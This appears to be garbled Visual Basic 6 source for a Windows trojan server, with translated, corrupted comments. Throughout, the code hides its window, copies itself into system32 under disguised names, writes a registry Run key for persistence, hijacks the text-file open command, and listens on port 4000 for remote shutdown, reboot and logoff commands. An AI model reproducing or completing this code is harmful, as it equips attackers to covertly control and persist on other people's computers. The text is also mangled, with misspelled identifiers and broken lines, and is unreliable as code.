'Main Fact: FRM_WINSOCK'Winsock Control: G_Server
Private Sub Form_Load () 'Hide Process'' Read Host IP Hostip = G_Server.localip 'Read Host Name Hostname = G_Server.localHostName with Me' Sets local default port .G_server.localport = 4000 'Monitor .G_server.listen' Hide Form. Hide End with
'Get Trojans directory Dim sCurrentPath As String sCurrentPath = App.Path & "/" & App.EXEName & ".exe" Debug.Print sCurrentPath Dim sSystemDir As String sSystemDir = "C: / winnt / system32" On Error Resume Next' Copy the file into system directory Systrsy.exe filecopy scurntpath, ssystemdir & "/systy.exe" on error resume next "Copy file into system directory TXTVIEW.EXE FileCopy Scurrentpath, Ssystemdir &" /txtview.exe "
'Call Call StartupGroup Call WriteTotxt
'Is it running if app.previnstance dam running if app.previnstance dam? End end ifend sub
Private sub g_server_connectionRequest (Byval Requestid As long) with me if .g_server.state <> SCKCLOSED THEN G_SERVER.CLOSE .G_SERVER.ACCEPT Requestid End Withend Sub
Private Sub G_Server_DataArrival (ByVal bytesTotal As Long) Dim strData As String With Me 'receives the client information request .G_Server.GetData strData Select Case strData Case "Exit"' Shutdown Call ExitWindowsEx (EWX_SHUTDOWN, 0) Case "Reboot" 'Restart Call ExitWindowsEx (EWX_REBOOT, 0) CASE "logoff" Logout Call ExitWindowsex (EWX_LOGOFF, 0) End Select End Withend Sub
'modAPI module
'Declare Global Variables Public HostIP As VariantPublic HostName As Variant' statement API function Public Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, _ ByVal dwReserved As Long) _ As LongPublic Const EWX_LOGOFF = 0Public Const EWX_REBOOT = 2Public Const EWX_SHUTDOWN = 1Public Declare Function ClipCursor Lib "user32" (lpRect As Any) As LongPublic Type RECT Left As Long Top As Long Right As Long Bottom As LongEnd TypePublic Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, _ ByVal LPSUBKEY AS STRING, _EVALIC DECLARE FUNCTION RegSetValueex Lib "Advapi32.dll" Alias "RegSetValueexa" (Byval HKey As Long, _ BYVAL LPVALUENAME AS STRING, _ BYVAL RESERVED As Long, _ Byval Dewtype As long, _ lpdata as any, _ byval cbdata as long _ as longpublic declare function regreateKey lib "advapi32.dll"
Alias "RegCreateKeyA" (ByVal hKey As Long, _ ByVal lpSubKey As String, _ phkResult As Long) _ As LongPublic Const REG_BINARY = 3Public Const REG_SZ = 1Public Const HKEY_LOCAL_MACHINE = & H80000002Public Const HKEY_CLASSES_ROOT = & H80000000Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, _ byval bscan as byte, _ byval dwflags as long, _ byval dwextrainfo as long
'Write the process of the registry launch group () DIM SKEY AS STARTUPGROUP () DIM SKEY AS STRING DIM RESULT AS Long Dim HKEYID AS Long Dim SkeyVal AS String' Startup key to find a similar to the system file. SKEY = "SYSTRSY" 'Trojan file path, you can use GetSystemDirectory to get the system path. skeyVal = "C: /winnt/system32/systrsy.exe" result = RegOpenKey (HKEY_LOCAL_MACHINE, "Software / Microsoft / Windows / CurrentVersion / Run", hKeyID) If result = 0 Then Debug.Print hKeyID & "/ n" result = RegSetValueex (HKEYID, SKEY, 0 &, REG_SZ, SKEYVAL, LEN (SKEY) 1) Debug.Print Result & "/ N" End IFEND SUB
'With TXT files PUBLIC SUB WRITETXT () DIM RESULT AS Long Dim HKeyid As Long Dim Skey As String Dim Skeyval AS STRING SKEY = TXTFILE / Shell / Open / Command "SKEYVAL =" C: / Windows / System / TxtView. exe "result = RegOpenKey (HKEY_CLASSES_ROOT, skeyVal, hKeyID) If result = 0 Then Debug.Print hKeyID &" / n "result = RegSetvalueEx (hKeyID, skey, 0 &, REG_SZ, skeyVal, Len (skeyVal) 1) Debug.Print Result end ifend sub
